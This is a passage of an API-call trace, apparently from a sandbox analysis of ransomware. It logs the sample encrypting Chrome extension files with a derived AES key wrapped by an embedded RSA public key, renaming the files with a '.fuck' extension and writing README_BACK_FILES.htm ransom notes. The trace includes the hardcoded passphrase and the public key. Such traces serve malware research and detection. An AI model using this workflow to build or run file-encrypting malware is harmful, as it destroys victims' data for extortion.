pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.959] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.959] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.959] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.959] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.959] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.959] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.959] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.959] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.959] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.959] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.959] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.959] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.960] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.960] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.960] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.960] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.960] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.960] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.960] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.960] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.960] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.960] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.960] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.960] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.960] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.960] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.960] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.960] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.961] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.961] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.961] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.961] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.961] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.961] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.961] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.961] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.961] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.961] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.961] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.961] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.961] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.961] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.961] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.961] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.961] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.961] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.962] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.962] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.962] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.962] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x1db, lpOverlapped=0x0) returned 1 [0263.962] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x1db, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x1e0) returned 1 [0263.962] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x1e0, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x1e0, lpOverlapped=0x0) returned 1 [0263.962] CloseHandle (hObject=0x5d5c) returned 1 [0263.962] CloseHandle (hObject=0x5d60) returned 1 [0263.962] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ro\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ro\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ro\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ro\\messages.json"), bFailIfExists=0) returned 1 [0263.966] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ro\\messages.json", dwFileAttributes=0x0) returned 1 [0263.966] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ro\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ro\\messages.json.gsg")) returned 1 [0263.967] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ro\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ro\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ro\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ro\\messages.json.fuck")) returned 1 [0263.968] CryptDestroyHash (hHash=0x2e7fd40) returned 1 [0263.968] CryptDestroyKey (hKey=0x2e7de00) returned 1 [0263.968] CryptReleaseContext (hProv=0x2e7a500, dwFlags=0x0) returned 1 [0263.968] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0263.969] FindClose (in: hFindFile=0x2e7fc40 | out: hFindFile=0x2e7fc40) returned 1 [0263.969] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ro\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ro\\readme_back_files.htm")) returned 0xffffffff [0263.969] AreFileApisANSI () returned 1 [0263.969] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x275c330, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 162 [0263.969] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ro\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ro\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d64 [0263.970] GetFileType (hFile=0x5d64) returned 0x1 [0263.970] WriteFile (in: hFile=0x5d64, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0263.971] FindNextFileA (in: hFindFile=0x2e7fc00, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0263.971] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ru\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2e7fc40 [0263.971] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0263.971] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0263.971] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0263.971] GetLastError () returned 0x0 [0263.971] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ru\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ru\\messages.json")) returned 0x20 [0263.971] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ru\\messages.json", dwFileAttributes=0x80) returned 1 [0263.972] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ru\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ru\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0263.972] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ru\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ru\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0263.973] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ru\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0263.973] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2e7a500) returned 1 [0263.975] CryptCreateHash (in: hProv=0x2e7a500, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0263.975] lstrlenA (lpString="hdyBJCVtAqmxyhbnkFvIscGGzMlQm") returned 29 [0263.975] CryptHashData (hHash=0x2e7fd40, pbData=0x28cb6c0, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0263.975] CryptDeriveKey (in: hProv=0x2e7a500, Algid=0x6610, hBaseData=0x2e7fd40, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2e7da00) returned 1 [0263.975] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----o", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0263.975] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0263.976] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2e75880) returned 1 [0263.976] CryptImportPublicKeyInfo (in: hCryptProv=0x2e75880, dwCertEncodingType=0x1, pInfo=0x2eaf7e0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2eaf810*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2eaf818*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2e7e400) returned 1 [0263.976] CryptEncrypt (in: hKey=0x2e7e400, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0263.976] CryptEncrypt (in: hKey=0x2e7e400, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e75088*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2e75088*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0263.976] WriteFile (in: hFile=0x5d5c, lpBuffer=0x2e75088*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2e75088*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0263.977] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.983] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.983] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.984] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.985] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.985] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.985] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, 